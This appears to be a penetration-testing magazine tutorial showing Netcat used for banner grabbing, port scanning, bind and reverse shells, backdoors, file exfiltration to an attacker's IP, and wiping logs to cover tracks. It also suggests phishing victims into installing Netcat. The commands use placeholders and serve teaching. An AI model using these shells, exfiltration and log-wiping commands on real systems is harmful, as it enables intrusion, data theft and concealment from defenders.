I have been asked to write an article for PentestMag and here it is. Enjoy it
Netcat has been created by “Hobbit” and its first stable released was in 2007. We all know Netcat’s legendary remark for being the “Swiss army knife” for pentesting, but do we really know everything about it? We all have used Netcat for one thing or another, but the truth is that with Netcat can be used for a plethora of things!
If you had to do some sort of security certifications or simply done some cyber-security courses, you will come across up with the famous phases of “hacking”:
3. Gaining Access
4. Maintaining Access
5. Covering Tracks
We all have used Netcat to do any of these functions in many ways. We even tried to make a chat client and perhaps even transferred files over a network; but did we ever used Netcat at its fullest and at every phase of Pentesting? Let’s check:
Step 1: Reconnaissance
We can perform banner grabbing in order to determine the web server type and version they have as well as any other service’s version. Sure, we can do this with Telnet, but Netcat does not alter the stream of data and supports TCP as well as UDP unlike Telnet. The command for Netcat banner grabbing is the following:
nc [IP address] [port number]
A practical example would be:
Please, note that is very useful to use this method because it tells us not only the web application’s server but also its version which you might want to consider skipping step 2.
You can also trying to enter HEAD / OPTIONS for get some response header stating scripting language which the web server is primarily written on (in this case PHP):
If we try the same syntax by changing the port number, we will get interesting results if the ports are opened:
Step 2: Scanning
If we try to scan for specific ports in order to find potential sensitive information through outdated software and/or web application versions on the server we can use the following command:
nc –vv –n –z –w1 [IP-address] [port number range]
In the screenshot we can see a clear example:
This is what every flag does:
-vv: display more verbose message of the output.
-n: run the scan without resolving hostname.
-z: run the scan without sending any data to the target system.
-w1: wait no more than 1 sec to make each request.
IP address: IP Address of the host we want to scan
Port Numbers: A range can be used as well as skip individual ports separated by commas.
With this method, we can simply figure out what ports are being opened and which are closed by looking at the connection status (closed/open). If you would like more information about a certain port, you can try the banner grabbing technique to figure out what the version is.
Step 3: Gaining Access
How good is to have the whole system infrastructure layout and ‑knowing they are using an out of date version of a software as well as knowing it’s vulnerable if we can’t show the evidence by gaining access to the system? One very common way for Netcat to have access to a system is to send a crafted file which remotely creates a Netcat listener inbound connection to a given port back to the attacker. Note that the target system also has to have Netcat installed to accomplish this but this can be accomplished by:
1) Social Engineering the victim into installing it.
2) By performing phishing.
3) Physical access to the system.
Then, after the connection is being made, the attacker can easily connect to the listening port and IP of the target machine and remote execute code on his behalf. The snippet is as easy as this:
nc –l –p [listening port] –v –e /bin/bash
nc [Target IP] [listening port]
Besides performing a bind shell to the client, you can also use Netcat to perform a reverse shell in case you want to proceed which is useful while performing in a NATed system. Unlike ports, reverse shell assigns a connection to the user (attacker) through a shell. Note: To attack the target’s machine which is behind a NAT, port-forwarding must be set up on the target’s machine IP and port.
Step 4: Maintaining Access
Netcat also has great functionalities which allows you to create backdoors in order to come back later to the system. We have seen how to create a listener thus creating the chance of having a backdoor to remote execute as well as retrieving files from the target machine; but how about copying files or exfiltrate data?
For this test, we used corporate_secrets.txt as the file we think the target machine has. To copy from the target’s machine to the Pentester’s machine, simply do the following:
(in target’s machine)
cat [file_to_exfiltritate]| nc [IP of Pentester] [Port]
(in Pentester’s machine)
nc –n –vv –p 1337 > [file_to_exfiltrate]
Also copying files to the target’s system is possible:
nc –lp 1337 > [file]
nc [IP of target] < [file]
Visual Example :
Step 5: Covering Tracks
We know that every successful hack is not successful if we leave tracks all over the place. For this case, we can even delete logs by echoing to a blank space to the file or overwriting it with a chunk data or even copying over a fake log file overwriting it on the target system.
echo “ “ > log.txt
nc [victim IP] [port number] > log file.
Tips and Tricks
In one terminal, type:
nc –vlp 1337
In the other terminal type:
nc [IP of 1st terminal] 1337
Send spoofed HTTP Requests
nc [domain.com] 80
GET / HTTP/1.1
[Press Enter twice]
Make an instant Web Server with Netcat
while true; do nc –lp 80 –q 1 < test.html; done
Cloning Hard Drive Partitions over the network
dd if=/dev/sda | nc [IP address] 1337
Netcat is more than simply a tool. The phase of hacking and penetration testing is simple but with Netcat it can be used and seen much simpler than what it really is. Netcat is been in the Pentesting industry for decades, but this article helps you to keep in touch with old and still reliable ways of taking over systems. It is true that with the help of Metasploit and the Meterpreter it is also possible to create backdoors and do more post-exploitation techniques but it is beyond this scope of this article. The purpose of it was to clarify that Netcat is still great and simple to do all phases of hacking.